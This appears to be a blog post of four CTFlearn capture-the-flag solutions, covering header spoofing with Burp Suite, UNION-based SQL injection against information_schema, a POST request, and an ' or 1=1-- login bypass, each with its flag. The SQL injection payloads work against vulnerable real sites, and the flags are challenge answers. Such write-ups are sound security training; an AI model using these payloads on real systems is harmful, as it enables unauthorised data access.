CTFlearn solution: Don’t Bump Your Head(er)

When viewing this page source, we got a message:

Then, we will use Burp Suite to catch the packet and change the Header to:

User-Agent: Sup3rS3cr3tAg3nt

And we got another message:

Hence, we will add two lines to the Header:

User-Agent: Sup3rS3cr3tAg3nt
Referer: awesomesauce.com

And we found the flag:

Flag: flag{did_this_m3ss_with_y0ur_h34d}

CTFlearn solution: Inj3ction Time

In this lab, we will find all tables with payload:

1 union SELECT null,table_name,null,null FROM information_schema.tables--

and we found table “w0w_y0u_f0und_m3“.

Then, we find all columns with payload:

1 union SELECT null,column_name,null,null FROM information_schema.columns--

and we found column “f0und_m3“.

Finally, we use payload:

1 union SELECT null,f0und_m3,null,null FROM w0w_y0u_f0und_m3--

And we find the flag.

Flag: abctf{uni0n_1s_4_gr34t_c0mm4nd}

CTFlearn solution: POST Practice

So, we need to send a POST request to the server, but what is the data?

“view-source” should be the first place we think about, and we find it.

With this data, we make a POST request, here I use Postman to do this.

Flag: flag{p0st_d4t4_4ll_d4y}

CTFlearn solution: Basic Injection

We just need to input payload:

' or 1=1-- 

(note the space after the double dash)

Flag: th4t_is_why_you_n33d_to_sanitiz3_inputs